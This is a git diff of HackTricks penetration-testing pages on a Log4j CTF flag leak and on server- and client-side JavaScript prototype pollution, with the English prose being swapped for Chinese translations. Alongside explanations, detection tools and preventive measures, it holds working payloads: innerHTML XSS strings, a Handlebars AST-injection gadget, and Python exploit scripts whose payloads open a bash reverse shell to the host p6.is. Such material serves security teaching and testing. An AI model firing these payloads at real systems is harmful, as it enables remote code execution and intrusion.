-As it was mentioned in the previous section, **`%replace`** supports **regexes**. So it's possible to use payload from the [**ReDoS page**](../regular-expression-denial-of-service-redos.md) to cause a **timeout** in case the flag is found.\
-For example, a payload like `%replace{${env:FLAG}}{^(?=CTF)((.`_`)`_`)*salt$}{asd}` would trigger a **timeout** in that CTF.
-
-In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/), instead of using a ReDoS attack it used an **amplification attack** to cause a time difference in the response:
+在这个 [**写作**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) 中，使用了 **放大攻击** 而不是 ReDoS 攻击来造成响应中的时间差：
 
 > ```
 > /%replace{
@@ -444,11 +416,11 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l
 > }{#}{######################################################}
 > ```
 >
-> If the flag starts with `flagGuess`, the whole flag is replaced with 29 `#`-s (I used this character because it would likely not be part of the flag). **Each of the resulting 29 `#`-s is then replaced by 54 `#`-s**. This process is repeated **6 times**, leading to a total of ` 29*54*54^6* =`` `` `**`96816014208`** **`#`-s!**
+> 如果标志以 `flagGuess` 开头，整个标志将被 29 个 `#` 替换（我使用这个字符是因为它可能不会是标志的一部分）。**然后将结果中的每个 29 个 `#` 替换为 54 个 `#`**。这个过程重复 **6 次**，导致总共 ` 29*54*54^6* =`` `` `**`96816014208`** **`#`！**
 >
-> Replacing so many `#`-s will trigger the 10-second timeout of the Flask application, which in turn will result in the HTTP status code 500 being sent to the user. (If the flag does not start with `flagGuess`, we will receive a non-500 status code)
+> 替换这么多的 `#` 将触发 Flask 应用程序的 10 秒超时，这将导致 HTTP 状态代码 500 被发送给用户。（如果标志不以 `flagGuess` 开头，我们将收到非 500 状态代码）
 
-## References
+## 参考文献
 
 - [https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/](https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/)
 - [https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/](https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/)
@@ -460,4 +432,3 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l
 - [https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
index c7d1f8b79..92b1478fd 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
@@ -2,30 +2,27 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Objects in JavaScript <a href="#id-053a" id="id-053a"></a>
-
-Objects in JavaScript are essentially collections of key-value pairs, known as properties. An object can be created using `Object.create` with `null` as an argument to produce an empty object. This method allows the creation of an object without any inherited properties.
+## JavaScript中的对象 <a href="#id-053a" id="id-053a"></a>
 
+JavaScript中的对象本质上是键值对的集合，称为属性。可以使用 `Object.create` 并将 `null` 作为参数来创建一个空对象。此方法允许创建一个没有任何继承属性的对象。
 ```javascript
 // Run this in the developers tools console
 console.log(Object.create(null)) // This will output an empty object.
 ```
+一个空对象类似于一个空字典，表示为`{}`。
 
-An empty object is akin to an empty dictionary, represented as `{}`.
-
-### Functions and Classes in JavaScript
-
-In JavaScript, classes and functions are closely linked, with functions often serving as constructors for classes. Despite JavaScript's lack of native class support, constructors can emulate class behavior.
+### JavaScript中的函数和类
 
+在JavaScript中，类和函数密切相关，函数通常作为类的构造函数。尽管JavaScript缺乏原生类支持，但构造函数可以模拟类的行为。
 ```javascript
 // Run this in the developers tools console
 
 function Employee(name, position) {
-  this.name = name
-  this.position = position
-  this.introduce = function () {
-    return "My name is " + this.name + " and I work as a " + this.position + "."
-  }
+this.name = name
+this.position = position
+this.introduce = function () {
+return "My name is " + this.name + " and I work as a " + this.position + "."
+}
 }
 
 Employee.prototype
@@ -34,70 +31,62 @@ var employee1 = new Employee("Generic Employee", "Developer")
 
 employee1.__proto__
 ```
+### JavaScript中的原型
 
-### Prototypes in JavaScript
+JavaScript允许在运行时修改、添加或删除原型属性。这种灵活性使得类功能的动态扩展成为可能。
 
-JavaScript allows the modification, addition, or deletion of prototype attributes at runtime. This flexibility enables the dynamic extension of class functionalities.
+像`toString`和`valueOf`这样的函数可以被改变以改变它们的行为，展示了JavaScript原型系统的适应性。
 
-Functions like `toString` and `valueOf` can be altered to change their behavior, demonstrating the adaptable nature of JavaScript's prototype system.
+## 继承
 
-## Inheritance
+在基于原型的编程中，属性/方法由对象从类中继承。这些类是通过将属性/方法添加到另一个类的实例或一个空对象来创建的。
 
-In prototype-based programming, properties/methods are inherited by objects from classes. These classes are created by adding properties/methods either to an instance of another class or to an empty object.
+需要注意的是，当一个属性被添加到作为其他对象原型的对象（例如`myPersonObj`）时，继承的对象可以访问这个新属性。然而，除非明确调用，否则这个属性不会自动显示。
 
-It should be noted that when a property is added to an object serving as the prototype for other objects (such as `myPersonObj`), the inheriting objects gain access to this new property. However, this property is not automatically displayed unless it is explicitly invoked.
+## \_\_proto\_\_ 污染 <a href="#id-0d0a" id="id-0d0a"></a>
 
-## \_\_proto\_\_ pollution <a href="#id-0d0a" id="id-0d0a"></a>
+## 探索JavaScript中的原型污染
 
-## Exploring Prototype Pollution in JavaScript
-
-JavaScript objects are defined by key-value pairs and inherit from the JavaScript Object prototype. This means altering the Object prototype can influence all objects in the environment.
-
-Let's use a different example to illustrate:
+JavaScript对象由键值对定义，并从JavaScript对象原型继承。这意味着改变对象原型可以影响环境中的所有对象。
 
+让我们用一个不同的例子来说明：
 ```javascript
 function Vehicle(model) {
-  this.model = model
+this.model = model
 }
 var car1 = new Vehicle("Tesla Model S")
 ```
-
-Access to the Object prototype is possible through:
-
+可以通过以下方式访问 Object 原型：
 ```javascript
 car1.__proto__.__proto__
 Vehicle.__proto__.__proto__
 ```
-
-By adding properties to the Object prototype, every JavaScript object will inherit these new properties:
-
+通过向 Object 原型添加属性，每个 JavaScript 对象将继承这些新属性：
 ```javascript
 function Vehicle(model) {
-  this.model = model
+this.model = model
 }
 var car1 = new Vehicle("Tesla Model S")
 // Adding a method to the Object prototype
 car1.__proto__.__proto__.announce = function () {
-  console.log("Beep beep!")
+console.log("Beep beep!")
 }
 car1.announce() // Outputs "Beep beep!"
 // Adding a property to the Object prototype
 car1.__proto__.__proto__.isVehicle = true
 console.log(car1.isVehicle) // Outputs true
 ```
+## 原型污染
 
-## prototype pollution
-
-For a scenario where `__proto__` usage is restricted, modifying a function's prototype is an alternative:
-
+对于限制使用 `__proto__` 的场景，修改函数的原型是一个替代方案：
 ```javascript
 function Vehicle(model) {
-  this.model = model
+this.model = model
 }
 var car1 = new Vehicle("Tesla Model S")
 // Adding properties to the Vehicle prototype
 Vehicle.prototype.beep = function () {
-  console.log("Beep beep!")
+console.log("Beep beep!")
 }
 car1.beep() // Now works and outputs "Beep beep!"
 Vehicle.prototype.hasWheels = true
@@ -105,65 +94,57 @@ console.log(car1.hasWheels) // Outputs true
 
 // Alternate method
 car1.constructor.prototype.honk = function () {
-  console.log("Honk!")
+console.log("Honk!")
 }
 car1.constructor.prototype.isElectric = true
 ```
+这仅影响通过 `Vehicle` 构造函数创建的对象，使它们具有 `beep`、`hasWheels`、`honk` 和 `isElectric` 属性。
 
-This affects only objects created from the `Vehicle` constructor, giving them the `beep`, `hasWheels`, `honk`, and `isElectric` properties.
-
-Two methods to globally affect JavaScript objects through prototype pollution include:
-
-1. Polluting the `Object.prototype` directly:
+通过原型污染全局影响 JavaScript 对象的两种方法包括：
 
+1. 直接污染 `Object.prototype`：
 ```javascript
 Object.prototype.goodbye = function () {
-  console.log("Goodbye!")
+console.log("Goodbye!")
 }
 ```
-
-2. Polluting the prototype of a constructor for a commonly used structure:
-
+2. 污染常用结构的构造函数原型：
 ```javascript
 var example = { key: "value" }
 example.constructor.prototype.greet = function () {
-  console.log("Hello!")
+console.log("Hello!")
 }
 ```
+在这些操作之后，每个 JavaScript 对象都可以执行 `goodbye` 和 `greet` 方法。
 
-After these operations, every JavaScript object can execute `goodbye` and `greet` methods.
+## 污染其他对象
 
-## Polluting other objects
-
-### From a class to Object.prototype
-
-In an scenario where you can **pollute an specific object** and you need to **get to `Object.prototype`** you can search for it with something like the following code:
+### 从类到 Object.prototype
 
+在一个可以 **污染特定对象** 的场景中，如果你需要 **到达 `Object.prototype`**，你可以使用以下代码进行搜索：
 ```javascript
 // From https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/
 
 // Search from "window" object
 for (let key of Object.getOwnPropertyNames(window)) {
-  if (window[key]?.constructor.prototype === Object.prototype) {
-    console.log(key)
-  }
+if (window[key]?.constructor.prototype === Object.prototype) {
+console.log(key)
+}
 }
 
 // Imagine that the original object was document.querySelector('a')
 // With this code you could find some attributes to get the object "window" from that one
 for (let key1 in document.querySelector("a")) {
-  for (let key2 in document.querySelector("a")[key1]) {
-    if (document.querySelector("a")[key1][key2] === window) {
-      console.log(key1 + "." + key2)
-    }
-  }
+for (let key2 in document.querySelector("a")[key1]) {
+if (document.querySelector("a")[key1][key2] === window) {
+console.log(key1 + "." + key2)
+}
+}
 }
 ```
+### 数组元素污染
 
-### Array elements pollution
-
-Note that as you can pollute attributes of objects in JS, if you have access to pollute an array you can also **pollute values of the array** accessible **by indexes** (note that you cannot overwrite values, so you need to pollute indexes that are somehow used but not written).
-
+请注意，由于您可以污染 JS 中对象的属性，如果您有权污染数组，您也可以通过索引**污染数组的值**（请注意，您无法覆盖值，因此您需要污染以某种方式使用但未写入的索引）。
 ```javascript
 c = [1, 2]
 a = []
@@ -173,11 +154,9 @@ b[0] //undefined
 b[1] //"yolo"
 c[1] // 2 -- not
 ```
+### Html 元素污染
 
-### Html elements pollution
-
-When generating a HTML element via JS it's possible to **overwrite** the **`innerHTML`** attribute to make it write **arbitrary HTML code.** [Idea and example from this writeup](https://blog.huli.tw/2022/04/25/en/intigriti-0422-xss-challenge-author-writeup/).
-
+当通过 JS 生成 HTML 元素时，可以 **覆盖** **`innerHTML`** 属性以使其写入 **任意 HTML 代码。** [Idea and example from this writeup](https://blog.huli.tw/2022/04/25/en/intigriti-0422-xss-challenge-author-writeup/).
 ```javascript
 // Create element
 devSettings["root"] = document.createElement('main')
@@ -188,121 +167,111 @@ settings[root][innerHTML]=<"svg onload=alert(1)>"
 // Pollute innerHTML of the ownerProperty to avoid overwrites of innerHTML killing the payload
 settings[root][ownerDocument][body][innerHTML]="<svg onload=alert(document.domain)>"
 ```
+## 示例
 
-## Examples
+### 基本示例
 
-### Basic Example
-
-A prototype pollution occurs due to a flaw in the application that allows overwriting properties on `Object.prototype`. This means that since most objects derive their properties from `Object.prototype`
-
-The easies example is to add a value to an **undefiner attribute of an object** that is going to be checked, like:
+原型污染是由于应用程序中的缺陷导致的，该缺陷允许覆盖 `Object.prototype` 上的属性。这意味着大多数对象从 `Object.prototype` 派生其属性。
 
+最简单的示例是向将要被检查的对象的 **未定义属性** 添加一个值，例如：
 ```javascript
 if (user.admin) {
 ```
-
-If the attribute **`admin` is undefined** it's possible to abuse a PP and set it to True with something like:
-
+如果属性 **`admin` 未定义**，则可以利用 PP 并将其设置为 True，例如：
 ```javascript
 Object.prototype.isAdmin = true
 let user = {}
 user.isAdmin // true
 ```
+该机制涉及操纵属性，以便如果攻击者控制某些输入，他们可以修改应用程序中所有对象的原型。这种操纵通常涉及设置 `__proto__` 属性，在 JavaScript 中，这与直接修改对象的原型同义。
 
-The mechanism behind this involves manipulating properties such that if an attacker has control over certain inputs, they can modify the prototype of all objects in the application. This manipulation typically involves setting the `__proto__` property, which, in JavaScript, is synonymous with directly modifying an object's prototype.
+成功执行此攻击的条件，如特定 [研究](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf) 中所述，包括：
 
-The conditions under which this attack can be successfully executed, as outlined in a specific [study](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf), include:
-
-- Performing a recursive merge.
-- Defining properties based on a path.
-- Cloning objects.
+- 执行递归合并。
+- 基于路径定义属性。
+- 克隆对象。
 
 ### Override function
-
 ```python
 customer.__proto__.toString = ()=>{alert("polluted")}
 ```
-
-### Proto Pollution to RCE
+### 原型污染到 RCE
 
 {{#ref}}
 prototype-pollution-to-rce.md
 {{#endref}}
 
-Other payloads:
+其他有效载荷：
 
 - [https://github.com/KTH-LangSec/server-side-prototype-pollution](https://github.com/KTH-LangSec/server-side-prototype-pollution)
 
-## Client-side prototype pollution to XSS
+## 客户端原型污染到 XSS
 
 {{#ref}}
 client-side-prototype-pollution.md
 {{#endref}}
 
-### CVE-2019–11358: Prototype pollution attack through jQuery $ .extend
-
-[For further details check this article](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7) In jQuery, the `$ .extend` function can lead to prototype pollution if the deep copy feature is utilized improperly. This function is commonly used for cloning objects or merging properties from a default object. However, when misconfigured, properties intended for a new object can be assigned to the prototype instead. For instance:
+### CVE-2019–11358：通过 jQuery $ .extend 的原型污染攻击
 
+[有关更多详细信息，请查看本文](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7) 在 jQuery 中，`$ .extend` 函数如果深拷贝功能使用不当，可能导致原型污染。此函数通常用于克隆对象或合并来自默认对象的属性。然而，当配置错误时，原本用于新对象的属性可能会被分配给原型。例如：
 ```javascript
 $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}'))
 console.log({}.devMode) // Outputs: true
 ```
+此漏洞被识别为 CVE-2019–11358，说明深拷贝如何无意中修改原型，从而导致潜在的安全风险，例如如果像 `isAdmin` 这样的属性在没有适当存在验证的情况下被检查，则可能导致未授权的管理员访问。
 
-This vulnerability, identified as CVE-2019–11358, illustrates how a deep copy can inadvertently modify the prototype, leading to potential security risks, such as unauthorized admin access if properties like `isAdmin` are checked without proper existence verification.
+### CVE-2018–3721, CVE-2019–10744: 通过 lodash 的原型污染攻击
 
-### CVE-2018–3721, CVE-2019–10744: Prototype pollution attack through lodash
+[有关更多详细信息，请查看本文](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7)
 
-[For further details check this article](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7)
+[Lodash](https://www.npmjs.com/package/lodash) 遇到了类似的原型污染漏洞 (CVE-2018–3721, CVE-2019–10744)。这些问题在版本 4.17.11 中得到了修复。
 
-[Lodash](https://www.npmjs.com/package/lodash) encountered similar prototype pollution vulnerabilities (CVE-2018–3721, CVE-2019–10744). These issues were addressed in version 4.17.11.
-
-### Another tutorial with CVEs
+### 另一个包含 CVE 的教程
 
 {% embed url="https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2" %}
 
-### Tools to detect Prototype Pollution
+### 检测原型污染的工具
 
-- [**Server-Side-Prototype-Pollution-Gadgets-Scanner**](https://github.com/doyensec/Server-Side-Prototype-Pollution-Gadgets-Scanner): Burp Suite extension designed to detect and analyze server-side prototype pollution vulnerabilities in web applications. This tool automates the process of scanning requests to identify potential prototype pollution issues. It exploits known gadgets - methods of leveraging prototype pollution to execute harmful actions - particularly focusing on Node.js libraries.
-- [**server-side-prototype-pollution**](https://github.com/portswigger/server-side-prototype-pollution): This extension identifies server side prototype pollution vulnerabilities. It uses techniques described in the [server side prototype pollution](https://portswigger.net/research/server-side-prototype-pollution).
+- [**Server-Side-Prototype-Pollution-Gadgets-Scanner**](https://github.com/doyensec/Server-Side-Prototype-Pollution-Gadgets-Scanner): Burp Suite 扩展，旨在检测和分析 Web 应用程序中的服务器端原型污染漏洞。该工具自动化扫描请求的过程，以识别潜在的原型污染问题。它利用已知的工具 - 利用原型污染执行有害操作的方法 - 特别关注 Node.js 库。
+- [**server-side-prototype-pollution**](https://github.com/portswigger/server-side-prototype-pollution): 此扩展识别服务器端原型污染漏洞。它使用在 [server side prototype pollution](https://portswigger.net/research/server-side-prototype-pollution) 中描述的技术。
 
-### AST Prototype Pollution in NodeJS
+### NodeJS 中的 AST 原型污染
 
-NodeJS extensively utilizes Abstract Syntax Trees (AST) in JavaScript for functionalities like template engines and TypeScript. This section explores the vulnerabilities related to prototype pollution in template engines, specifically Handlebars and Pug.
+NodeJS 在 JavaScript 中广泛使用抽象语法树 (AST) 进行模板引擎和 TypeScript 等功能。本节探讨与模板引擎中原型污染相关的漏洞，特别是 Handlebars 和 Pug。
 
-#### Handlebars Vulnerability Analysis
+#### Handlebars 漏洞分析
 
-The Handlebars template engine is susceptible to a prototype pollution attack. This vulnerability arises from specific functions within the `javascript-compiler.js` file. The `appendContent` function, for instance, concatenates `pendingContent` if it's present, while the `pushSource` function resets `pendingContent` to `undefined` after adding the source.
+Handlebars 模板引擎易受原型污染攻击。此漏洞源于 `javascript-compiler.js` 文件中的特定函数。例如，`appendContent` 函数在存在时会连接 `pendingContent`，而 `pushSource` 函数在添加源后将 `pendingContent` 重置为 `undefined`。
 
-**Exploitation Process**
+**利用过程**
 
-The exploitation leverages the AST (Abstract Syntax Tree) produced by Handlebars, following these steps:
+利用过程利用 Handlebars 生成的 AST（抽象语法树），遵循以下步骤：
 
-1. **Manipulation of the Parser**: Initially, the parser, via the `NumberLiteral` node, enforces that values are numeric. Prototype pollution can circumvent this, enabling the insertion of non-numeric strings.
-2. **Handling by the Compiler**: The compiler can process an AST Object or a string template. If `input.type` equals `Program`, the input is treated as pre-parsed, which can be exploited.
-3. **Injection of Code**: Through manipulation of `Object.prototype`, one can inject arbitrary code into the template function, which may lead to remote code execution.
-
-An example demonstrating the exploitation of the Handlebars vulnerability:
+1. **解析器的操控**：最初，解析器通过 `NumberLiteral` 节点强制值为数字。原型污染可以规避此限制，从而允许插入非数字字符串。
+2. **编译器的处理**：编译器可以处理 AST 对象或字符串模板。如果 `input.type` 等于 `Program`，则输入被视为预解析，这可以被利用。
+3. **代码注入**：通过操控 `Object.prototype`，可以将任意代码注入模板函数，这可能导致远程代码执行。
 
+一个演示 Handlebars 漏洞利用的示例：
 ```javascript
 const Handlebars = require("handlebars")
 
 Object.prototype.type = "Program"
 Object.prototype.body = [
-  {
-    type: "MustacheStatement",
-    path: 0,
-    params: [
-      {
-        type: "NumberLiteral",
-        value:
-          "console.log(process.mainModule.require('child_process').execSync('id').toString())",
-      },
-    ],
-    loc: {
-      start: 0,
-      end: 0,
-    },
-  },
+{
+type: "MustacheStatement",
+path: 0,
+params: [
+{
+type: "NumberLiteral",
+value:
+"console.log(process.mainModule.require('child_process').execSync('id').toString())",
+},
+],
+loc: {
+start: 0,
+end: 0,
+},
+},
 ]
 
 const source = `Hello {{ msg }}`
@@ -310,15 +279,13 @@ const template = Handlebars.precompile(source)
 
 console.log(eval("(" + template + ")")["main"].toString())
 ```
+此代码展示了攻击者如何将任意代码注入到 Handlebars 模板中。
 
-This code showcases how an attacker could inject arbitrary code into a Handlebars template.
+**外部参考**：在 'flat' 库中发现了与原型污染相关的问题，详细信息请参见此处：[GitHub 上的问题](https://github.com/hughsk/flat/issues/105)。
 
-**External Reference**: An issue related to prototype pollution was found in the 'flat' library, as detailed here: [Issue on GitHub](https://github.com/hughsk/flat/issues/105).
-
-**External Reference**: [Issue related to prototype pollution in the 'flat' library](https://github.com/hughsk/flat/issues/105)
-
-Example of prototype pollution exploit in Python:
+**外部参考**：[与 'flat' 库中的原型污染相关的问题](https://github.com/hughsk/flat/issues/105)
 
+Python 中原型污染利用的示例：
 ```python
 import requests
 
@@ -326,31 +293,29 @@ TARGET_URL = 'http://10.10.10.10:9090'
 
 # make pollution
 requests.post(TARGET_URL + '/vulnerable', json = {
-    "__proto__.type": "Program",
-    "__proto__.body": [{
-        "type": "MustacheStatement",
-        "path": 0,
-        "params": [{
-            "type": "NumberLiteral",
-            "value": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/p6.is/3333 0>&1'`)"
-        }],
-        "loc": {
-            "start": 0,
-            "end": 0
-        }
-    }]
+"__proto__.type": "Program",
+"__proto__.body": [{
+"type": "MustacheStatement",
+"path": 0,
+"params": [{
+"type": "NumberLiteral",
+"value": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/p6.is/3333 0>&1'`)"
+}],
+"loc": {
+"start": 0,
+"end": 0
+}
+}]
 })
 
 # execute
 requests.get(TARGET_URL)
 ```
+#### Pug 漏洞
 
-#### Pug Vulnerability
-
-Pug, another template engine, faces a similar risk of prototype pollution. Detailed information is available in the discussion on [AST Injection in Pug](https://blog.p6.is/AST-Injection/#Pug).
-
-Example of prototype pollution in Pug:
+Pug，另一个模板引擎，面临着类似的原型污染风险。详细信息可在关于 [AST Injection in Pug](https://blog.p6.is/AST-Injection/#Pug) 的讨论中找到。
 
+Pug 中原型污染的示例：
 ```python
 import requests
 
@@ -358,33 +323,32 @@ TARGET_URL = 'http://10.10.10.10:9090'
 
 # make pollution
 requests.post(TARGET_URL + '/vulnerable', json = {
-    "__proto__.block": {
-        "type": "Text",
-        "line": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/p6.is/3333 0>&1'`)"
-    }
+"__proto__.block": {
+"type": "Text",
+"line": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/p6.is/3333 0>&1'`)"
+}
 })
 
 # execute
 requests.get(TARGET_URL)
 ```
+### 预防措施
 
-### Preventive Measures
+为了降低原型污染的风险，可以采用以下策略：
 
-To reduce the risk of prototype pollution, the strategies listed below can be employed:
+1. **对象不可变性**：可以通过应用 `Object.freeze` 使 `Object.prototype` 变为不可变。
+2. **输入验证**：JSON 输入应严格根据应用程序的架构进行验证。
+3. **安全合并函数**：应避免不安全的递归合并函数使用。
+4. **无原型对象**：可以使用 `Object.create(null)` 创建没有原型属性的对象。
+5. **使用 Map**：应使用 `Map` 来存储键值对，而不是 `Object`。
+6. **库更新**：通过定期更新库来纳入安全补丁。
+7. **Linter 和静态分析工具**：使用如 ESLint 之类的工具，配合适当的插件，检测和防止原型污染漏洞。
+8. **代码审查**：实施全面的代码审查，以识别和修复与原型污染相关的潜在风险。
+9. **安全培训**：教育开发人员了解原型污染的风险及编写安全代码的最佳实践。
+10. **谨慎使用库**：在使用第三方库时要谨慎。评估其安全态势并审查其代码，特别是那些操作对象的库。
+11. **运行时保护**：采用运行时保护机制，例如使用专注于安全的 npm 包，以检测和防止原型污染攻击。
 
-1. **Object Immutability**: The `Object.prototype` can be made immutable by applying `Object.freeze`.
-2. **Input Validation**: JSON inputs should be rigorously validated against the application's schema.
-3. **Safe Merge Functions**: The unsafe use of recursive merge functions should be avoided.
-4. **Prototype-less Objects**: Objects without prototype properties can be created using `Object.create(null)`.
-5. **Use of Map**: Instead of `Object`, `Map` should be used for storing key-value pairs.
-6. **Library Updates**: Security patches can be incorporated by regularly updating libraries.
-7. **Linter and Static Analysis Tools**: Use tools like ESLint with appropriate plugins to detect and prevent prototype pollution vulnerabilities.
-8. **Code Reviews**: Implement thorough code reviews to identify and remediate potential risks related to prototype pollution.
-9. **Security Training**: Educate developers about the risks of prototype pollution and best practices for writing secure code.
-10. **Using Libraries with Caution**: Be cautious while using third-party libraries. Assess their security posture and review their code, especially those manipulating objects.
-11. **Runtime Protection**: Employ runtime protection mechanisms such as using security-focused npm packages which can detect and prevent prototype pollution attacks.
-
-## References
+## 参考文献
 
 - [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
 - [https://dev.to/caffiendkitten/prototype-inheritance-pollution-2o5l](https://dev.to/caffiendkitten/prototype-inheritance-pollution-2o5l)
@@ -392,4 +356,3 @@ To reduce the risk of prototype pollution, the strategies listed below can be em
 - [https://blog.p6.is/AST-Injection/](https://blog.p6.is/AST-Injection/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
index 44593ee6d..3b84f79b1 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
@@ -1,79 +1,75 @@
-# Client Side Prototype Pollution
+# 客户端原型污染
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Discovering using Automatic tools
+## 使用自动工具发现
 
-The tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0)**,** [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **and** [**https://github.com/kosmosec/proto-find**](https://github.com/kosmosec/proto-find) can be used to **find prototype pollution vulnerabilities**.
+工具 [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0)**,** [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **和** [**https://github.com/kosmosec/proto-find**](https://github.com/kosmosec/proto-find) 可用于 **查找原型污染漏洞**。
 
-Moreover, you could also use the **browser extension** [**PPScan**](https://github.com/msrkp/PPScan) to **automatically** **scan** the **pages** you **access** for prototype pollution vulnerabilities.
-
-### Debugging where a property is used <a href="#id-5530" id="id-5530"></a>
+此外，您还可以使用 **浏览器扩展** [**PPScan**](https://github.com/msrkp/PPScan) **自动** **扫描** 您 **访问** 的 **页面** 以查找原型污染漏洞。
 
+### 调试属性使用的位置 <a href="#id-5530" id="id-5530"></a>
 ```javascript
 // Stop debugger where 'potentialGadget' property is accessed
 Object.defineProperty(Object.prototype, "potentialGadget", {
-  __proto__: null,
-  get() {
-    console.trace()
-    return "test"
-  },
+__proto__: null,
+get() {
+console.trace()
+return "test"
+},
 })
 ```
+### 查找原型污染的根本原因 <a href="#id-5530" id="id-5530"></a>
 
-### Finding the root cause of Prototype Pollution <a href="#id-5530" id="id-5530"></a>
+一旦通过任何工具识别出原型污染漏洞，并且代码不是过于复杂，您可以通过在 Chrome 开发者工具中搜索关键字如 `location.hash`、`decodeURIComponent` 或 `location.search` 来找到漏洞。这种方法可以帮助您准确定位 JavaScript 代码中的漏洞部分。
 
-Once a prototype pollution vulnerability has been identified by any of the tools, and if the code is not overly complex, you might find the vulnerability by searching for keywords such as `location.hash`, `decodeURIComponent`, or `location.search` in the Chrome Developer Tools. This approach allows you to pinpoint the vulnerable section of the JavaScript code.
-
-For larger and more complex codebases, a straightforward method to discover the vulnerable code involves the following steps:
-
-1. Use a tool to identify a vulnerability and obtain a payload designed to set a property in the constructor. An example provided by ppmap might look like: `constructor[prototype][ppmap]=reserved`.
-2. Set a breakpoint at the first line of JavaScript code that will execute on the page. Refresh the page with the payload, pausing the execution at this breakpoint.
-3. While the JavaScript execution is paused, execute the following script in the JS console. This script will signal when the 'ppmap' property is created, aiding in locating its origin:
+对于更大和更复杂的代码库，发现漏洞代码的简单方法包括以下步骤：
 
+1. 使用工具识别漏洞并获取一个旨在设置构造函数中属性的有效载荷。ppmap 提供的示例可能看起来像：`constructor[prototype][ppmap]=reserved`。
+2. 在页面上将 JavaScript 代码的第一行设置为断点。使用有效载荷刷新页面，在此断点处暂停执行。
+3. 当 JavaScript 执行暂停时，在 JS 控制台中执行以下脚本。该脚本将在创建 'ppmap' 属性时发出信号，帮助定位其来源：
 ```javascript
 function debugAccess(obj, prop, debugGet = true) {
-  var origValue = obj[prop]
+var origValue = obj[prop]
 
-  Object.defineProperty(obj, prop, {
-    get: function () {
-      if (debugGet) debugger
-      return origValue
-    },
-    set: function (val) {
-      debugger
-      origValue = val
-    },
-  })
+Object.defineProperty(obj, prop, {
+get: function () {
+if (debugGet) debugger
+return origValue
+},
+set: function (val) {
+debugger
+origValue = val
+},
+})
 }
 
 debugAccess(Object.prototype, "ppmap")
 ```
+4. 返回到 **Sources** 标签并选择“恢复脚本执行”。JavaScript 将继续执行，'ppmap' 属性将如预期被污染。利用提供的代码片段可以帮助识别 'ppmap' 属性被污染的确切位置。通过检查 **Call Stack**，可以观察到污染发生的不同堆栈。
 
-4. Navigate back to the **Sources** tab and select “Resume script execution”. The JavaScript will continue executing, and the 'ppmap' property will be polluted as expected. Utilizing the provided snippet facilitates the identification of the exact location where the 'ppmap' property is polluted. By examining the **Call Stack**, different stacks where the pollution occurred can be observed.
-
-When deciding which stack to investigate, it is often useful to target stacks associated with JavaScript library files, as prototype pollution frequently occurs within these libraries. Identify the relevant stack by examining its attachment to library files (visible on the right side, similar to an image provided for guidance). In scenarios with multiple stacks, such as those on lines 4 and 6, the logical choice is the stack on line 4, as it represents the initial occurrence of pollution and thereby the root cause of the vulnerability. Clicking on the stack will direct you to the vulnerable code.
+在决定调查哪个堆栈时，通常有用的是针对与 JavaScript 库文件相关的堆栈，因为原型污染通常发生在这些库中。通过检查其与库文件的关联（在右侧可见，类似于提供的图像以供参考）来识别相关堆栈。在有多个堆栈的情况下，例如第 4 行和第 6 行，逻辑选择是第 4 行的堆栈，因为它代表了污染的初始发生，从而是漏洞的根本原因。点击该堆栈将引导您到易受攻击的代码。
 
 ![https://miro.medium.com/max/1400/1*S8NBOl1a7f1zhJxlh-6g4w.jpeg](https://miro.medium.com/max/1400/1*S8NBOl1a7f1zhJxlh-6g4w.jpeg)
 
-## Finding Script Gadgets
